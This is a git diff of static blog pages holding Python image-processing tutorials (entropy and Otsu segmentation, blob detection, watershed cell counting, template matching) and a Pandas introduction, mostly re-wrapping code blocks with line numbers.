        • Put the code from single image segmentation in a for loop to apply segmentaion to all images
            @@ -905,7 +903,7 @@

            for file in glob.glob(path):
            img=io.imread(file)
            entropy_img = entropy(img, disk(3))
            thresh = threshold_otsu(entropy_img)
            binary = entropy_img <= thresh
            scratch_area = np.sum(binary == 1)
            scratch_area = scratch_area * ((scale) ** 2) # Convert to microns from pixel units
            print("time=", time, "hr ", "Scratch area=", scratch_area, "um\N{SUPERSCRIPT TWO}")
            time_list.append(time)
            area_list.append(scratch_area)
            time += 1
            +
            1
            2
            3
            4
            5
            6
            7
            8
            9
            10
            11
            for file in glob.glob(path):
            img=io.imread(file)
            entropy_img = entropy(img, disk(3))
            thresh = threshold_otsu(entropy_img)
            binary = entropy_img <= thresh
            scratch_area = np.sum(binary == 1)
            scratch_area = scratch_area * ((scale) ** 2) # Convert to microns from pixel units
            print("time=", time, "hr ", "Scratch area=", scratch_area, "um\N{SUPERSCRIPT TWO}")
            time_list.append(time)
            area_list.append(scratch_area)
            time += 1
            time= 0 hr   Scratch area= 6768.765 um²
             time= 1 hr   Scratch area= 5605.807500000001 um²
             time= 2 hr   Scratch area= 4881.465 um²
            @@ -917,7 +915,7 @@ 

            plt.plot(time_list, area_list, 'bo')  # Print blue dots scatter plot
            +
            1
            plt.plot(time_list, area_list, 'bo')  # Print blue dots scatter plot
            [<matplotlib.lines.Line2D at 0x295b35d21c0>]
             

            png

            @@ -929,18 +927,18 @@

            from scipy.stats import linregress  # Linear regression

            slope, intercept, r_value, p_value, std_err = linregress(time_list, area_list)
            print("y = ",slope, "x", " + ", intercept)
            print("R\N{SUPERSCRIPT TWO} = ", r_value ** 2)
            +
            1
            2
            3
            4
            5
            from scipy.stats import linregress  # Linear regression

            slope, intercept, r_value, p_value, std_err = linregress(time_list, area_list)
            print("y = ",slope, "x", " + ", intercept)
            print("R\N{SUPERSCRIPT TWO} = ", r_value ** 2)
            y =  -507.25881818181824 x  +  6096.792681818182
             R² =  0.9568904267126052
             

            Tutorial 55 - Image segmentation followed by measurements- in python

            -
            from skimage import measure, io, img_as_ubyte
            import matplotlib.pyplot as plt
            from skimage.color import label2rgb, rgb2gray
            import numpy as np
            import cv2
            -
            image = img_as_ubyte(rgb2gray(io.imread('images/cast_iron1.tif')))
            scale = 0.6
            -
            plt.imshow(image, cmap='gray')
            +
            1
            2
            3
            4
            5
            from skimage import measure, io, img_as_ubyte
            import matplotlib.pyplot as plt
            from skimage.color import label2rgb, rgb2gray
            import numpy as np
            import cv2
            +
            1
            2
            image = img_as_ubyte(rgb2gray(io.imread('images/cast_iron1.tif')))
            scale = 0.6
            +
            1
            plt.imshow(image, cmap='gray')
            <matplotlib.image.AxesImage at 0x200892d89a0>
             

            png

            -
            plt.hist(image.flat, bins=100, range=(0, 255))
            +
            1
            plt.hist(image.flat, bins=100, range=(0, 255))
            (array([    0.,    46.,   479.,  1449.,   966.,  1498.,  1081.,  1901.,
                      1408.,  2200.,  2605.,  1816.,  2434.,  1382.,  1474.,   686.,
                       719.,   387.,   439.,   275.,   322.,   311.,   195.,   347.,
            @@ -970,14 +968,14 @@ 

            png

            -
            from skimage.filters import threshold_otsu
            threshold = threshold_otsu(image)
            threshold
            +
            1
            2
            3
            from skimage.filters import threshold_otsu
            threshold = threshold_otsu(image)
            threshold
            93
             
            -
            # Generate thresholded image
            thresholded_img = image < threshold
            plt.imshow(thresholded_img, cmap='gray')
            +
            1
            2
            3
            # Generate thresholded image
            thresholded_img = image < threshold
            plt.imshow(thresholded_img, cmap='gray')
            <matplotlib.image.AxesImage at 0x20089b28760>
             

            png

            -
            # Remove edge touching regions
            from skimage.segmentation import clear_border

            edge_touching_removed = clear_border(thresholded_img)
            plt.imshow(edge_touching_removed, cmap='gray')
            +
            1
            2
            3
            4
            5
            # Remove edge touching regions
            from skimage.segmentation import clear_border

            edge_touching_removed = clear_border(thresholded_img)
            plt.imshow(edge_touching_removed, cmap='gray')
            <matplotlib.image.AxesImage at 0x20089c39ca0>
             

            png

            @@ -1013,7 +1011,7 @@

          -
          label_image = measure.label(edge_touching_removed, connectivity=image.ndim)
          plt.imshow(label_image)
          +
          1
          2
          label_image = measure.label(edge_touching_removed, connectivity=image.ndim)
          plt.imshow(label_image)
          <matplotlib.image.AxesImage at 0x20089c9dbb0>
           

          png

          @@ -1028,11 +1026,11 @@

          Using label2rgb

        -
        image_label_overlay = label2rgb(label_image, image=image)
        plt.imshow(image_label_overlay)
        +
        1
        2
        image_label_overlay = label2rgb(label_image, image=image)
        plt.imshow(image_label_overlay)
        <matplotlib.image.AxesImage at 0x20089d0a8e0>
         

        png

        -
        #################################################
        # Calculate properties
        # Using regionprops or regionprops_table
        all_props = measure.regionprops(label_image, image)
        # Can print various parameters for all objects
        for prop in all_props:
        print('Label: {} Area: {}'.format(prop.label, prop.area))
        +
        1
        2
        3
        4
        5
        6
        7
        #################################################
        # Calculate properties
        # Using regionprops or regionprops_table
        all_props = measure.regionprops(label_image, image)
        # Can print various parameters for all objects
        for prop in all_props:
        print('Label: {} Area: {}'.format(prop.label, prop.area))
        • Compute image properties and return them as a pandas-compatible table.

          @@ -1047,8 +1045,8 @@

        -
        props = measure.regionprops_table(label_image, image, 
        properties=['label',
        'area', 'equivalent_diameter',
        'mean_intensity', 'solidity'])
        -
        import pandas as pd
        df = pd.DataFrame(props)
        df.head()
        +
        1
        2
        3
        4
        props = measure.regionprops_table(label_image, image, 
        properties=['label',
        'area', 'equivalent_diameter',
        'mean_intensity', 'solidity'])
        +
        1
        2
        3
        import pandas as pd
        df = pd.DataFrame(props)
        df.head()
        @@ -1103,7 +1101,7 @@

        -
        # To delete small regions...
        df = df[df['area'] > 50]
        df.head()
        +
        1
        2
        3
        # To delete small regions...
        df = df[df['area'] > 50]
        df.head()
        @@ -1159,7 +1157,7 @@

        Convert to micron scale

        -
        df['area_sq_microns'] = df['area'] * (scale ** 2)
        df['equivalent_diameter_microns'] = df['equivalent_diameter'] * (scale)
        df.head()
        +
        1
        2
        3
        df['area_sq_microns'] = df['area'] * (scale ** 2)
        df['equivalent_diameter_microns'] = df['equivalent_diameter'] * (scale)
        df.head()
        @@ -1226,7 +1224,7 @@

        -
        df.to_csv('data/cast_iron_measurements.csv')
        +
        1
        df.to_csv('data/cast_iron_measurements.csv')

        Tutorial 56 - Blob Detector for segmentation based on feature properties -in python-

        blob_百度百科 (baidu.com)

        @@ -1289,8 +1287,8 @@

        import matplotlib.pyplot as plt
        import numpy as np
        import cv2
        -
        image = cv2.imread('images/cast_iron1.tif', 0)
        +
        1
        2
        3
        import matplotlib.pyplot as plt
        import numpy as np
        import cv2
        +
        1
        image = cv2.imread('images/cast_iron1.tif', 0)
        • Set up the SimpleBlobdetector with default parameters.
            @@ -1298,7 +1296,7 @@

            params = cv2.SimpleBlobDetector_Params()
            +
            1
            params = cv2.SimpleBlobDetector_Params()
            • Define thresholds
                @@ -1307,7 +1305,7 @@

                params.minThreshold = 0
                params.maxThreshold = 255
                +
                1
                2
                params.minThreshold = 0
                params.maxThreshold = 255
                • Filter by Area.
                    @@ -1315,7 +1313,7 @@

                    params.filterByArea = True
                    params.minArea = 50
                    params.maxArea = 10000
                    +
                    1
                    2
                    3
                    params.filterByArea = True
                    params.minArea = 50
                    params.maxArea = 10000
                    • Filter by Color (black=0)
                        @@ -1323,7 +1321,7 @@

                        params.filterByColor = False  #Set true for cast_iron as we'll be detecting black regions
                        params.blobColor = 0
                        +
                        1
                        2
                        params.filterByColor = False  #Set true for cast_iron as we'll be detecting black regions
                        params.blobColor = 0
                        • Filter by Circularity
                            @@ -1331,7 +1329,7 @@

                            params.filterByCircularity = True
                            params.minCircularity = 0.5
                            params.maxCircularity = 1
                            +
                            1
                            2
                            3
                            params.filterByCircularity = True
                            params.minCircularity = 0.5
                            params.maxCircularity = 1
                            • Filter by Convexity
                                @@ -1339,7 +1337,7 @@

                                params.filterByConvexity = True
                                params.minConvexity = 0.5
                                params.maxConvexity = 1
                                +
                                1
                                2
                                3
                                params.filterByConvexity = True
                                params.minConvexity = 0.5
                                params.maxConvexity = 1
                                • Filter by InertiaRatio
                                    @@ -1347,7 +1345,7 @@

                                    params.filterByInertia = True
                                    params.minInertiaRatio = 0
                                    params.maxInertiaRatio = 1
                                    +
                                    1
                                    2
                                    3
                                    params.filterByInertia = True
                                    params.minInertiaRatio = 0
                                    params.maxInertiaRatio = 1
                                    • Distance Between Blobs
                                        @@ -1355,7 +1353,7 @@

                                        params.minDistBetweenBlobs = 0
                                        +
                                        1
                                        params.minDistBetweenBlobs = 0
                                        • Setup the detector with parameters
                                            @@ -1363,7 +1361,7 @@

                                            detector = cv2.SimpleBlobDetector_create(params)
                                            +
                                            1
                                            detector = cv2.SimpleBlobDetector_create(params)
                                            • Detect blobs
                                                @@ -1371,7 +1369,7 @@

                                                keypoints = detector.detect(image)
                                                print("Number of blobs detected are : ", len(keypoints))
                                                +
                                                1
                                                2
                                                keypoints = detector.detect(image)
                                                print("Number of blobs detected are : ", len(keypoints))
                                                Number of blobs detected are :  82
                                                 
                                                  @@ -1381,7 +1379,7 @@

                                                  img_with_blobs = cv2.drawKeypoints(image, keypoints, np.array([]), (0,0,255), cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)
                                                  plt.imshow(img_with_blobs)
                                                  +
                                                  1
                                                  2
                                                  img_with_blobs = cv2.drawKeypoints(image, keypoints, np.array([]), (0,0,255), cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)
                                                  plt.imshow(img_with_blobs)
                                                  <matplotlib.image.AxesImage at 0x2b46aa494f0>
                                                   

                                                  png

                                                  @@ -1486,8 +1484,8 @@

                                                -
                                                import cv2
                                                import numpy as np
                                                from matplotlib import pyplot as plt
                                                from scipy import ndimage
                                                from skimage import measure, color, io
                                                -
                                                img = cv2.imread('images/Osteosarcoma_01.tif')
                                                +
                                                1
                                                2
                                                3
                                                4
                                                5
                                                import cv2
                                                import numpy as np
                                                from matplotlib import pyplot as plt
                                                from scipy import ndimage
                                                from skimage import measure, color, io
                                                +
                                                1
                                                img = cv2.imread('images/Osteosarcoma_01.tif')
                                                • Extract only blue channel as DAPI / nuclear (blue) staining is the best channel to perform cell count.

                                                  @@ -1502,8 +1500,8 @@

                                                -
                                                cells = img[:, :, 0]
                                                -
                                                plt.imshow(cells, cmap='gray')
                                                +
                                                1
                                                cells = img[:, :, 0]
                                                +
                                                1
                                                plt.imshow(cells, cmap='gray')
                                                <matplotlib.image.AxesImage at 0x2b36b074850>
                                                 

                                                png

                                                @@ -1515,7 +1513,7 @@

                                              -
                                              pixels_to_um = 0.454
                                              +
                                              1
                                              pixels_to_um = 0.454

                                              STEP 1: Thresholded image for nuclei 核的阈值图像

                                              • Threshold image to binary using OTSU. ALl thresholded pixels will be set to 255 @@ -1524,7 +1522,7 @@

                                              -
                                              ret1, thresh = cv2.threshold(cells, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)
                                              plt.imshow(thresh, cmap='gray')
                                              +
                                              1
                                              2
                                              ret1, thresh = cv2.threshold(cells, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)
                                              plt.imshow(thresh, cmap='gray')
                                              <matplotlib.image.AxesImage at 0x2b36b181f10>
                                               

                                              png

                                              @@ -1542,7 +1540,7 @@

                                            -
                                            kernel = np.ones((3,3),np.uint8)
                                            opening = cv2.morphologyEx(thresh,cv2.MORPH_OPEN,kernel, iterations = 2)

                                            from skimage.segmentation import clear_border
                                            opening = clear_border(opening) # Remove edge touching grains
                                            plt.imshow(opening, cmap='gray') # This is our image to be segmented further using watershed
                                            +
                                            1
                                            2
                                            3
                                            4
                                            5
                                            6
                                            kernel = np.ones((3,3),np.uint8)
                                            opening = cv2.morphologyEx(thresh,cv2.MORPH_OPEN,kernel, iterations = 2)

                                            from skimage.segmentation import clear_border
                                            opening = clear_border(opening) # Remove edge touching grains
                                            plt.imshow(opening, cmap='gray') # This is our image to be segmented further using watershed
                                            <matplotlib.image.AxesImage at 0x2b36bd0d6d0>
                                             

                                            png

                                            @@ -1610,7 +1608,7 @@

                                          -
                                          sure_bg = cv2.dilate(opening,kernel,iterations=10)
                                          plt.imshow(sure_bg, cmap='gray') # Dark region is our sure background
                                          +
                                          1
                                          2
                                          sure_bg = cv2.dilate(opening,kernel,iterations=10)
                                          plt.imshow(sure_bg, cmap='gray') # Dark region is our sure background
                                          <matplotlib.image.AxesImage at 0x2b36c5b2ac0>
                                           

                                          png

                                          @@ -1623,7 +1621,7 @@

                                        https://www.tutorialspoint.com/opencv/opencv_distance_transformation.htm

                                        -
                                        dist_transform = cv2.distanceTransform(opening,cv2.DIST_L2,5)
                                        plt.imshow(dist_transform, cmap='gray') # Dist transformed img.
                                        +
                                        1
                                        2
                                        dist_transform = cv2.distanceTransform(opening,cv2.DIST_L2,5)
                                        plt.imshow(dist_transform, cmap='gray') # Dist transformed img.
                                        <matplotlib.image.AxesImage at 0x2b36bd55d00>
                                         

                                        png

                                        @@ -1635,10 +1633,10 @@

                                      -
                                      print(dist_transform.max())  # gives about 21.9
                                      +
                                      1
                                      print(dist_transform.max())  # gives about 21.9
                                      21.968996
                                       
                                      -
                                      ret2, sure_fg = cv2.threshold(dist_transform,0.5*dist_transform.max(),255,0)
                                      plt.imshow(sure_fg, cmap='gray')
                                      +
                                      1
                                      2
                                      ret2, sure_fg = cv2.threshold(dist_transform,0.5*dist_transform.max(),255,0)
                                      plt.imshow(sure_fg, cmap='gray')
                                      <matplotlib.image.AxesImage at 0x2b36bdc25e0>
                                       

                                      png

                                      @@ -1663,7 +1661,7 @@

                                    -
                                    sure_fg = np.uint8(sure_fg)  # Convert to uint8 from float
                                    unknown = cv2.subtract(sure_bg,sure_fg)
                                    plt.imshow(unknown, cmap='gray')
                                    +
                                    1
                                    2
                                    3
                                    sure_fg = np.uint8(sure_fg)  # Convert to uint8 from float
                                    unknown = cv2.subtract(sure_bg,sure_fg)
                                    plt.imshow(unknown, cmap='gray')
                                    <matplotlib.image.AxesImage at 0x2b36be24c10>
                                     

                                    png

                                    @@ -1706,7 +1704,7 @@

                                  -
                                  ret3, markers = cv2.connectedComponents(sure_fg)
                                  plt.imshow(markers)
                                  +
                                  1
                                  2
                                  ret3, markers = cv2.connectedComponents(sure_fg)
                                  plt.imshow(markers)
                                  <matplotlib.image.AxesImage at 0x2b36d8060a0>
                                   

                                  png

                                  @@ -1730,7 +1728,7 @@

                                -
                                markers = markers + 10
                                +
                                1
                                markers = markers + 10
                                • Now, mark the region of unknown with zero
                                    @@ -1738,7 +1736,7 @@

                                  -
                                  markers[unknown==255] = 0
                                  plt.imshow(markers, cmap='jet') # Look at the 3 distinct regions.
                                  +
                                  1
                                  2
                                  markers[unknown==255] = 0
                                  plt.imshow(markers, cmap='jet') # Look at the 3 distinct regions.
                                  <matplotlib.image.AxesImage at 0x2b36d8f51c0>
                                   

                                  png

                                  @@ -1750,7 +1748,7 @@

                                -
                                markers = cv2.watershed(img,markers)
                                +
                                1
                                markers = cv2.watershed(img,markers)
                                • Let us color boundaries in yellow.

                                  @@ -1765,7 +1763,7 @@

                                -
                                img[markers == -1] = [0,255,255]  
                                +
                                1
                                img[markers == -1] = [0,255,255]  
                                • label2rgb - Return an RGB image where color-coded labels are painted over the image.
                                    @@ -1773,11 +1771,11 @@

                                  -
                                  img2 = color.label2rgb(markers, bg_label=0)
                                  plt.imshow(img2)
                                  +
                                  1
                                  2
                                  img2 = color.label2rgb(markers, bg_label=0)
                                  plt.imshow(img2)
                                  <matplotlib.image.AxesImage at 0x2b36d9c4970>
                                   

                                  png

                                  -
                                  plt.imshow(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))
                                  +
                                  1
                                  plt.imshow(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))
                                  <matplotlib.image.AxesImage at 0x2b36da2de50>
                                   

                                  png

                                  @@ -1795,7 +1793,7 @@

                                -
                                props = measure.regionprops_table(markers, cells, 
                                properties=['label',
                                'area', 'equivalent_diameter',
                                'mean_intensity', 'solidity', 'orientation',
                                'perimeter'])

                                import pandas as pd
                                df = pd.DataFrame(props)
                                df.head()
                                +
                                1
                                2
                                3
                                4
                                5
                                6
                                7
                                8
                                9
                                props = measure.regionprops_table(markers, cells, 
                                properties=['label',
                                'area', 'equivalent_diameter',
                                'mean_intensity', 'solidity', 'orientation',
                                'perimeter'])

                                import pandas as pd
                                df = pd.DataFrame(props)
                                df.head()
                                @@ -1869,7 +1867,7 @@

                                -

                                df = df[df['area'] > 50]
                                df.head()
                                +
                                1
                                2
                                df = df[df['area'] > 50]
                                df.head()
                                @@ -1943,7 +1941,7 @@

                                -

                                df['area_sq_microns'] = df['area'] * (pixels_to_um ** 2)
                                df['equivalent_diameter_microns'] = df['equivalent_diameter'] * (pixels_to_um)
                                df.head()
                                +
                                1
                                2
                                3
                                df['area_sq_microns'] = df['area'] * (pixels_to_um ** 2)
                                df['equivalent_diameter_microns'] = df['equivalent_diameter'] * (pixels_to_um)
                                df.head()
                                @@ -2080,16 +2078,16 @@

                                -

                                import cv2
                                import numpy as np
                                import matplotlib.pyplot as plt
                                -
                                img_rgb = cv2.imread('images/Ti_powder.tif')
                                img_gray = cv2.cvtColor(img_rgb, cv2.COLOR_BGR2GRAY)
                                plt.imshow(img_gray, cmap='gray')
                                +
                                1
                                2
                                3
                                import cv2
                                import numpy as np
                                import matplotlib.pyplot as plt
                                +
                                1
                                2
                                3
                                img_rgb = cv2.imread('images/Ti_powder.tif')
                                img_gray = cv2.cvtColor(img_rgb, cv2.COLOR_BGR2GRAY)
                                plt.imshow(img_gray, cmap='gray')
                                <matplotlib.image.AxesImage at 0x263a924c550>
                                 

                                png

                                -
                                template = cv2.imread('images/Ti_powder_single.tif', 0)
                                plt.imshow(template, cmap='gray')
                                +
                                1
                                2
                                template = cv2.imread('images/Ti_powder_single.tif', 0)
                                plt.imshow(template, cmap='gray')
                                <matplotlib.image.AxesImage at 0x263ae0a4be0>
                                 

                                png

                                -
                                h, w = template.shape[::]
                                h, w
                                +
                                1
                                2
                                h, w = template.shape[::]
                                h, w
                                (18, 16)
                                 
                                  @@ -2106,14 +2104,14 @@

                                -
                                # methods available: ['cv2.TM_CCOEFF', 'cv2.TM_CCOEFF_NORMED', 'cv2.TM_CCORR',
                                # 'cv2.TM_CCORR_NORMED', 'cv2.TM_SQDIFF', 'cv2.TM_SQDIFF_NORMED']
                                res = cv2.matchTemplate(img_gray, template, cv2.TM_SQDIFF)
                                plt.imshow(res, cmap='gray')
                                +
                                1
                                2
                                3
                                4
                                # methods available: ['cv2.TM_CCOEFF', 'cv2.TM_CCOEFF_NORMED', 'cv2.TM_CCORR',
                                # 'cv2.TM_CCORR_NORMED', 'cv2.TM_SQDIFF', 'cv2.TM_SQDIFF_NORMED']
                                res = cv2.matchTemplate(img_gray, template, cv2.TM_SQDIFF)
                                plt.imshow(res, cmap='gray')
                                <matplotlib.image.AxesImage at 0x263ae0ff8e0>
                                 

                                png

                                -
                                min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(res)
                                min_val, max_val, min_loc, max_loc
                                +
                                1
                                2
                                min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(res)
                                min_val, max_val, min_loc, max_loc
                                (4.0, 7702931.0, (318, 418), (66, 407))
                                 
                                -
                                # Change to max_loc for all excerpt for TM_SQDIFF
                                # 将除 TM_SQDIFF 外的所有数据更改为 max_loc
                                top_left = min_loc
                                bottom_right = (top_left[0] + w, top_left[1] + h)

                                # Black rectangle with thickness 2.
                                # 绘制厚度为 2 的黑色矩形。
                                cv2.rectangle(img_gray, top_left, bottom_right, 0, 1)

                                plt.imshow(img_gray, cmap='gray')
                                +
                                1
                                2
                                3
                                4
                                5
                                6
                                7
                                8
                                9
                                10
                                # Change to max_loc for all excerpt for TM_SQDIFF
                                # 将除 TM_SQDIFF 外的所有数据更改为 max_loc
                                top_left = min_loc
                                bottom_right = (top_left[0] + w, top_left[1] + h)

                                # Black rectangle with thickness 2.
                                # 绘制厚度为 2 的黑色矩形。
                                cv2.rectangle(img_gray, top_left, bottom_right, 0, 1)

                                plt.imshow(img_gray, cmap='gray')
                                <matplotlib.image.AxesImage at 0x263ae4de220>
                                 

                                png

                                @@ -2133,12 +2131,12 @@

                              -
                              import cv2
                              import numpy as np
                              from matplotlib import pyplot as plt

                              img_rgb = cv2.imread('images/Ti_powder.tif')
                              img_gray = cv2.cvtColor(img_rgb, cv2.COLOR_BGR2GRAY)
                              template = cv2.imread('images/Ti_powder_single.tif',0)
                              h, w = template.shape[::]

                              res = cv2.matchTemplate(img_gray, template, cv2.TM_CCOEFF_NORMED)
                              plt.imshow(res, cmap='gray')
                              +
                              1
                              2
                              3
                              4
                              5
                              6
                              7
                              8
                              9
                              10
                              11
                              import cv2
                              import numpy as np
                              from matplotlib import pyplot as plt

                              img_rgb = cv2.imread('images/Ti_powder.tif')
                              img_gray = cv2.cvtColor(img_rgb, cv2.COLOR_BGR2GRAY)
                              template = cv2.imread('images/Ti_powder_single.tif',0)
                              h, w = template.shape[::]

                              res = cv2.matchTemplate(img_gray, template, cv2.TM_CCOEFF_NORMED)
                              plt.imshow(res, cmap='gray')
                              <matplotlib.image.AxesImage at 0x263ae67ac40>
                               

                              png

                              -
                              # Pick only values above 0.8. For TM_CCOEFF_NORMED, larger values = good fit.
                              # 只选择高于0.8的值。对于TM_CCOEFF_NORMED,较大的值=良好的拟合。
                              threshold = 0.8

                              loc = np.where( res >= threshold)
                              # Outputs 2 arrays. Combine these arrays to get x,y coordinates - take x from one array and y from the other.
                              # 输出2个数组。组合这些数组得到x,y坐标——从一个数组取x,从另一个数组取y。

                              # Reminder: ZIP function is an iterator of tuples where first item in each iterator is paired together, then the second item and then third, etc.
                              # 提醒:ZIP函数是一个元组迭代器,其中每个迭代器中的第一个项配对在一起,然后是第二个项,然后是第三个,等等。

                              for pt in zip(*loc[::-1]): # -1 to swap the values as we assign x and y coordinate to draw the rectangle. -1来交换我们分配的x和y坐标来绘制矩形的值。
                              # Draw rectangle around each object. We know the top left (pt), draw rectangle to match the size of the template image. 在每个物体周围画一个矩形。我们知道左上角(pt),绘制矩形以匹配模板图像的大小。
                              cv2.rectangle(img_rgb, pt, (pt[0] + w, pt[1] + h), (0, 0, 255), 1) # Red rectangles with thickness 2.
                              -
                              plt.imshow(img_rgb)
                              +
                              1
                              2
                              3
                              4
                              5
                              6
                              7
                              8
                              9
                              10
                              11
                              12
                              13
                              14
                              # Pick only values above 0.8. For TM_CCOEFF_NORMED, larger values = good fit.
                              # 只选择高于0.8的值。对于TM_CCOEFF_NORMED,较大的值=良好的拟合。
                              threshold = 0.8

                              loc = np.where( res >= threshold)
                              # Outputs 2 arrays. Combine these arrays to get x,y coordinates - take x from one array and y from the other.
                              # 输出2个数组。组合这些数组得到x,y坐标——从一个数组取x,从另一个数组取y。

                              # Reminder: ZIP function is an iterator of tuples where first item in each iterator is paired together, then the second item and then third, etc.
                              # 提醒:ZIP函数是一个元组迭代器,其中每个迭代器中的第一个项配对在一起,然后是第二个项,然后是第三个,等等。

                              for pt in zip(*loc[::-1]): # -1 to swap the values as we assign x and y coordinate to draw the rectangle. -1来交换我们分配的x和y坐标来绘制矩形的值。
                              # Draw rectangle around each object. We know the top left (pt), draw rectangle to match the size of the template image. 在每个物体周围画一个矩形。我们知道左上角(pt),绘制矩形以匹配模板图像的大小。
                              cv2.rectangle(img_rgb, pt, (pt[0] + w, pt[1] + h), (0, 0, 255), 1) # Red rectangles with thickness 2.
                              +
                              1
                              plt.imshow(img_rgb)
                              <matplotlib.image.AxesImage at 0x263a957fc10>
                               

                              png

                              @@ -6174,6 +6172,8 @@

                              目录

                              var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/DIP-Python tutorials for image processing and machine learning(36-42)-Pandas/index.html b/posts/DIP-Python tutorials for image processing and machine learning(36-42)-Pandas/index.html index b8b98119dd..1b9cf7c76a 100644 --- a/posts/DIP-Python tutorials for image processing and machine learning(36-42)-Pandas/index.html +++ b/posts/DIP-Python tutorials for image processing and machine learning(36-42)-Pandas/index.html @@ -44,8 +44,6 @@ - - @@ -410,14 +408,14 @@

                            • 绘制直方图
                            -
                            import pandas as pd

                            df = pd.read_csv('images/grains/grain_measurements.csv')
                            df['Area'].plot(kind='hist', title='Area', bins=50)
                            +
                            1
                            2
                            3
                            4
                            import pandas as pd

                            df = pd.read_csv('images/grains/grain_measurements.csv')
                            df['Area'].plot(kind='hist', title='Area', bins=50)
                            <AxesSubplot:title={'center':'Area'}, ylabel='Frequency'>
                             

                            png

                            • 创建 DataFrame, 修改 index 和 columns
                            -
                            data = [[10, 200, 60],
                            [12, 155, 45],
                            [9, 50, -45.],
                            [16, 240, 90]]

                            df = pd.DataFrame(data, index=[1, 2, 3, 4], columns=['Area', 'Intensity', 'Orientation'])
                            df
                            +
                            1
                            2
                            3
                            4
                            5
                            6
                            7
                            data = [[10, 200, 60],
                            [12, 155, 45],
                            [9, 50, -45.],
                            [16, 240, 90]]

                            df = pd.DataFrame(data, index=[1, 2, 3, 4], columns=['Area', 'Intensity', 'Orientation'])
                            df
                            @@ -459,7 +457,7 @@

                          • 查看各行缺失信息
                          • -

                            import pandas as pd

                            df = pd.read_csv('data/manual_vs_auto.csv')
                            df.info()
                            +
                            1
                            2
                            3
                            4
                            import pandas as pd

                            df = pd.read_csv('data/manual_vs_auto.csv')
                            df.info()
                            <class 'pandas.core.frame.DataFrame'>
                             RangeIndex: 100 entries, 0 to 99
                             Data columns (total 7 columns):
                            @@ -478,13 +476,13 @@ 

                          • 查看表格行列数
                          -
                          df.shape
                          +
                          1
                          df.shape
                          (100, 7)
                           
                          • 查看整个表格
                          -
                          df
                          +
                          1
                          df
                          @@ -615,7 +613,7 @@

                        • 查看表格前 7 行
                        • -

                          df.head(7)
                          +
                          1
                          df.head(7)
                          @@ -705,7 +703,7 @@

                        • 查看表格后 7 行
                        • -

                          df.tail(7)
                          +
                          1
                          df.tail(7)
                          @@ -795,7 +793,7 @@

                        • 将某一列改为 index
                        • -

                          df1 = df.set_index('Image')
                          df1.head()
                          +
                          1
                          2
                          df1 = df.set_index('Image')
                          df1.head()
                          @@ -868,7 +866,7 @@

                        • 查看 columns(列)名
                        • -

                          df1.columns
                          +
                          1
                          df1.columns
                          Index(['Unnamed: 0', 'Manual', 'Manual2', 'Auto_th_2', 'Auto_th_3',
                                  'Auto_th_4'],
                                 dtype='object')
                          @@ -876,13 +874,13 @@ 

                        • 去重
                        -
                        df['Unnamed: 0'].unique()
                        +
                        1
                        df['Unnamed: 0'].unique()
                        array(['Set1', 'Set2', 'Set3', 'Set4'], dtype=object)
                         
                        • 修改列名
                        -
                        df1 = df.rename(columns={'Unnamed: 0': 'Image_set'})
                        df1.columns
                        +
                        1
                        2
                        df1 = df.rename(columns={'Unnamed: 0': 'Image_set'})
                        df1.columns
                        Index(['Image_set', 'Image', 'Manual', 'Manual2', 'Auto_th_2', 'Auto_th_3',
                                'Auto_th_4'],
                               dtype='object')
                        @@ -890,7 +888,7 @@ 

                      • 显示数据类型
                      -
                      df.dtypes
                      +
                      1
                      df.dtypes
                      Unnamed: 0     object
                       Image          object
                       Manual        float64
                      @@ -903,7 +901,7 @@ 

                    • 显示统计数据
                    -
                    df.describe()
                    +
                    1
                    df.describe()
                    @@ -983,7 +981,7 @@

                    37 - Introduction to Pandas - Data Manipulation

                    -
                    import pandas as pd

                    df = pd.read_csv('data/manual_vs_auto.csv')
                    df.head()
                    +
                    1
                    2
                    3
                    4
                    import pandas as pd

                    df = pd.read_csv('data/manual_vs_auto.csv')
                    df.head()
                    @@ -1053,7 +1051,7 @@

                    df1 = df.drop('Manual2', axis=1)
                    df1.head()
                    +
                    1
                    2
                    df1 = df.drop('Manual2', axis=1)
                    df1.head()
                    @@ -1117,7 +1115,7 @@

                    df2 = df.drop(['Manual2', 'Auto_th_2'], axis=1)
                    df2.head()
                    +
                    1
                    2
                    df2 = df.drop(['Manual2', 'Auto_th_2'], axis=1)
                    df2.head()
                    @@ -1175,7 +1173,7 @@

                    df['Date'] = '2019-06-24'
                    df.head()
                    +
                    1
                    2
                    df['Date'] = '2019-06-24'
                    df.head()
                    @@ -1248,7 +1246,7 @@

                    df.dtypes
                    +
                    1
                    df.dtypes
                    Unnamed: 0     object
                     Image          object
                     Manual        float64
                    @@ -1262,7 +1260,7 @@ 

                    df['Date'] = pd.to_datetime('2019-06-24')
                    df.head()
                    +
                    1
                    2
                    df['Date'] = pd.to_datetime('2019-06-24')
                    df.head()
                    @@ -1335,7 +1333,7 @@

                    df.dtypes
                    +
                    1
                    df.dtypes
                    Unnamed: 0            object
                     Image                 object
                     Manual               float64
                    @@ -1349,11 +1347,11 @@ 

                    df.to_csv('data/manual_vs_auto_updated.csv')
                    +
                    1
                    df.to_csv('data/manual_vs_auto_updated.csv')
                    • 删除某行
                    -
                    df1 = df.drop(df.index[1])
                    df1.head()
                    +
                    1
                    2
                    df1 = df.drop(df.index[1])
                    df1.head()
                    @@ -1429,7 +1427,7 @@

                    df1 = df.iloc[10:,]
                    df1.head()
                    +
                    1
                    2
                    df1 = df.iloc[10:,]
                    df1.head()
                    @@ -1505,7 +1503,7 @@

                    df1 = df[df['Unnamed: 0'] != 'Set1']
                    df1.head()
                    +
                    1
                    2
                    df1 = df[df['Unnamed: 0'] != 'Set1']
                    df1.head()
                    @@ -1582,11 +1580,11 @@

                    import pandas as pd

                    df = pd.read_csv('data/manual_vs_auto.csv')
                    df2 = df.sort_values('Manual', ascending=True) # ascending: 升序
                    +
                    1
                    2
                    3
                    4
                    import pandas as pd

                    df = pd.read_csv('data/manual_vs_auto.csv')
